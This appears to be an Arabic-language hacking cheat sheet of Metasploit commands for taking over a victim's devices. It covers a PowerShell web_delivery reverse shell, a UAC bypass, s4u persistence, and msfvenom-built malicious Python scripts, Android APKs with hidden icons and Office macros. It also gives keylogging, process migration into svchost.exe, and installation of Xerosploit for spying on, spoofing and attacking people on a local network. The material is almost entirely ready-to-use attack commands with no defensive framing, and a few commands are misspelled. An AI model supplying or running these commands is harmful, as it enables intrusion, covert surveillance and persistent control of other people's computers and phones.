استغلال بعض ثغرات MetaSploit 💻
________________________________________
أختراق Windows عن طريق Power Shell باستغلال ثغرة web_delivery
+) ماهو Power Shell ؟
هو عبارة عن أمر او مجموعة من الأوامر التنفيذية التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "
+) أوامر الأستغلال ~>
$ msfstart
$ msfconsole
$ use exploit/multi/script/web_delivery
$ show targets
$ set target <Numper Target>
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ show option
$ exploit
$ session -i
$ session -i <Numper Session>
________________________________________
تخطي UAC باستغلال ثغرة ASK
+) ماهو UAC ؟
هو عبارة عن صلاحيات الأدمن داخل جهاز الضحية
+) أوامر الأستغلال ~>
$ use exploit/windows/local/ask
$ set LHOST <ip>
$ set LPORT <port>
$ set session <numper session target>
$ set TECHNIQUE < PSH / EXE >
$ exploit
$ getsystem
$ run post/windows/gather/win_prives
________________________________________
استغلال ثغرة s4u لتثبيت الضحية و حقن البايلود في جميع يوزر الضحية
+) أوامر الأستغلال ~>
$ use exploit/windows/local/s4u_persistence
$ set session <numper session target>
$ set TRIGGER <even,lock,logon,schedule,unlock>
$ set LPORT <port>
$ exploit
________________________________________
اختراق الأجهزة بإستخدام سكربت بلغة الباثيون
+) صنع السكربت الملغم ~>
$ msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.py
+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload python/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
_________________________________________
اختراق الاندرويد عن طريق بايلود apk ملغم
+) صنع بايلود ملغم ~>
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.apk
+) الأستغلال ~>
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit -x hide_app_icon
_________________________________________
التنصت على لوحة مفاتيح الضحية
+) أوامر الأستغلال ~>
$ use post/windows/capture/keylog_recorder
$ set session <numper session target>
$ exploit
________________________________________
نقل عملية الاختراق داخل proceess عند قتل البايلود
+) أوامر الأستغلال ~>
$ use payload/windows/meterprerter/reverse_tcp
$ show advanced
$ set prependmigrate true
$ set prependmigrateproc svchost.exe
$ set LHOST <ip>
$ set LPORT <port>
$ generate -t exe -f <path>
________________________________________
تلغيم ملفات Microsoft Offic
+) أمر تلغيم ~>
$ mafvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f vba-exe
+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
________________________________________
Xerosploit هذه اﻷداة تمكنك من التجسس على من معك في نفس الشبكة, اﻷداة تجمع مختلف اﻷدوات.
Xerosploit
اﻷداة مدعومة من nmap و bettercap.
لكي تعمل اﻷداة يجب أن نتوفر على هذا اﻷدوات:
nmap
hping3
build-essential
ruby-dev
libpcap-dev
libgmp3-dev
tabulate
terminaltables
الخدمات التي توفرها:
Port scanning
Network mapping
Dos attack
Html code injection
Javascript code injection
Download intercaption and replacement
Sniffing
Dns spoofing
Background audio reproduction
Images replacement
Drifnet
Webpage defacement and more ...
تعمل على:
Ubuntu 15.10 وما فوق
Kali linux Rolling / Sana
Parrot OS 3.1
تثبيت اﻷداة:
تحميل اﻷداة من موقع Github
1
git clone https://github.com/LionSec/xerosploit
دخول في مجلد اﻷداة
1
cd xerosploit
تثبيت اﻷداة
1
sudo python install.py
استعمال اﻷداة
1
sudo xerosploit